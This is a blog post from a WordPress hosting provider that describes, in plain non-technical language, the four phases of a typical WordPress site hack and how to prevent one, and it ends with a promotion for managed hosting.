What happens during a WordPress hack in practice?

Your website has been hacked – what now? In this post I walk through a typical WordPress hack scenario step by step and explain what happens and how you can prevent it.

Introduction

Your website has been hacked – what now? Luckily you're not alone, because many SME owners and freelancers with a WordPress site experience this at some point. Hackers rarely choose you specifically as a target; instead they scan en masse for vulnerable websites. In other words: if your site has a weak spot, it can become the victim of an automated attack. In this blog post we walk step by step through a typical WordPress hack scenario. We discuss four phases – from the break-in to the blacklist – and we explain technical terms along the way in plain language. No panic or scare tactics, just realistic information about what can happen and how you can prevent it.

Step 1: Exploit – breaking in through a vulnerability

Every hack starts with a weak spot. A vulnerability (security flaw) in a plugin, theme or WordPress itself is discovered and abused – this abuse is called an exploit. Compare it to a burglar who finds an open window in your house. Research shows that in over 60% of hacked sites a plugin or theme vulnerability was the culprit. Many entrepreneurs, for example, use outdated plugins with known flaws. Think of a file upload vulnerability (where an attacker can upload a file without proper checks) or a SQL injection (where malicious database commands are executed via a form). Through such a flaw, a hacker can silently break into your site and, for example, create a script or account with admin rights. Such a first break-in often happens fully automatically: bots scour the internet for known vulnerabilities and attack every vulnerable site they find.

Practical example: In 2020 a vulnerability in the popular File Manager plugin was actively exploited. Security company Wordfence counted more than 1.7 million attacks in a few days via this single plugin flaw. You can imagine what happens if your site has that vulnerable plugin – the door is wide open for the hacker. Once inside, the attacker can execute code on your WordPress site (this is called Remote Code Execution, RCE). In the case of a SQL injection they can even read or modify the database; customer data or passwords can be stolen. In short, step 1 is the break-in: the hacker gains access to your site via a weak spot that could have been prevented (for example by updating in time).

Step 2: Persistence – the attacker stays present

Now that the intruder is inside, they want to stay. In this phase the attacker uses methods to ensure persistent presence, even if you were to patch the original vulnerability. One common trick is installing a backdoor – literally a “back door” in your website. This is hidden malicious code (for example a fake plugin or an extra PHP file) that gives the hacker access at any time. Compare it to a burglar who secretly leaves a key under your doormat; even after the first break-in they can easily get back in later. The hacker often also creates a hidden administrator account in WordPress. If you discover and delete that user, the backdoor ensures the account recreates itself. In other words, every time you throw the “intruder” out, their back door lets them back in.

A hacker installs a hidden backdoor in WordPress to keep access. Via such a backdoor, they can, for example, recreate an administrator account every time you remove it.

A hacker installs a hidden backdoor in WordPress to keep access. Via such a backdoor, they can, for example, recreate an administrator account every time you remove it.

In practice we see all kinds of clever persistence techniques. Backdoors are often disguised as legitimate files or plugins. One example is the fake DebugMaster plugin, which posed as a debug tool but meanwhile created hidden admin users and exfiltrated data. Hackers also inject code into crucial files such as wp-config.php or into the database, so their malicious instructions run on every page load. The result: the attacker nests deep in your site, and simple cleanup (such as removing one suspicious file) is usually not enough. Your site keeps getting reinfected unless all backdoors are found and removed.

Step 3: Spam and malware – abuse of your site

Once the attacker has gained a foothold, they start abusing your WordPress site for their own gain. Often malware is placed: malicious code that, for example, sends spam or alters your web pages. A well-known phenomenon is SEO spam – the site is filled with hidden text or links to boost the Google rankings of fraudulent sites. For example the notorious WordPress pharma hack, where your website quietly advertises fake medicines like Viagra and Cialis. You don't see that directly, but Google suddenly sees all kinds of spammy keywords on your domain. This is also called Black Hat SEO.

Another sign is that visitors experience strange behavior on your site. Hackers regularly place scripts that are only active for normal visitors (not when you're logged in as admin, so you don't notice). Such a script can redirect all visitors to another, dangerous website, or show pop-ups with malware downloads. In a case study, malware injected external JavaScript into websites that loaded for all visitors – except admins or known IP addresses – to spread viruses, for example. Backdoors can also remain hidden among normal files, allowing the attacker to regain access later (see step 2).

The consequences are serious. Your hard work and reputation are at stake. Imagine your site suddenly sending hundreds of spam emails or being full of invisible Viagra links – that damages your reputation and can scare customers away. Search engines can penalize you with a lower ranking or even show a warning like “This site may be hacked.” In addition, your website can be used as part of a larger botnet to carry out other attacks. Your domain and server can end up on spam lists, meaning that emails from your site no longer reach customers. (If a hacker uses your server as a mail relay for spam, your IP address will be blacklisted quickly.) In short, in this phase your website changes from a normal business card into a potential source of malware and spam on the internet – often without you noticing right away.

Step 4: Blacklist – the site gets blocked or flagged

Eventually the malicious activities of the hack do not go unnoticed. Major parties such as Google, browsers and mail providers want to protect their users and will blacklist a hacked website. Google Safe Browsing detects thousands of unsafe sites every day (with malware or phishing) and flags them with clear warnings. You may have seen it yourself: a bright red page with the message "Deceptive site ahead" or "This site may harm your computer." Such a Google blacklist warning means that Google considers your site unsafe because of malware or spam. Visitors coming from Google see that big red warning and probably leave immediately. Google also adds a “This site may be hacked” label in search results, and in serious cases removes your site from the index entirely (your pages disappear from search results). Antivirus software and certain browsers also block access to your domain once it is on the blacklist.

Besides Google, email services and hosting providers react too. If your site is known as a spam distributor or phishing site due to a hack, your emails will no longer pass spam filters. For example, Gmail and Outlook will refuse emails from your domain or place them in the spam folder. In the background, your IP address or domain name is added to international spam lists. A site on the blacklist means you first have to prove that you've cleaned up and are safe before those blocks are lifted again. It takes time and expertise to get off a blacklist. In the meantime you lose almost all your visitors and incoming messages – a disastrous situation for any entrepreneur.

Finally: how can you protect yourself?

This scenario may sound like a nightmare, but fortunately there is a lot you can do to prevent it. Keeping your WordPress core, plugins and themes up to date is step one – most hacks happen through flaws that were patched long ago, but never updated on the hacked system. In addition, a good security plugin and backups are indispensable for quick response when something goes wrong. Do you not have the time or knowledge to keep up with all this yourself? No worries. Managed WordPress hosting services (such as those from Jorijn Schrijvershof) handle the technical management, security and recovery from hacks for you. Such a service keeps your site proactively safe and up to date, and is ready to step in if something does happen – so you can run your business with peace of mind, without sleepless nights over malware on your site. Safety first, peace of mind.

Want fewer security surprises?

Staying safe is routine work: patching, monitoring, backups and defense-in-depth—done consistently.

See managed WordPress hosting

  1. WP Guardian (Patchstack) explained: extra protection when updates have to wait

    WP Guardian is an extra security layer with vulnerability scanning and virtual patching. This post explains what it does, what it doesn't do, and why it's especially useful when updates have to wait.

    1600 words
  2. What a Web Application Firewall does for WordPress (and what it doesn't)

    What does a Web Application Firewall (WAF) do for your WordPress site, and what doesn't it do? This article explains which attacks a WAF blocks, where the limits are, and how it helps in practice.

    2904 words
  3. Cheap hosting vs. managed hosting: the real Total Cost of Ownership

    Cheap hosting looks attractive, but the real cost is in time, risk, performance and lost revenue. This post compares the TCO of cheap vs. managed hosting using three practical scenarios.

    4846 words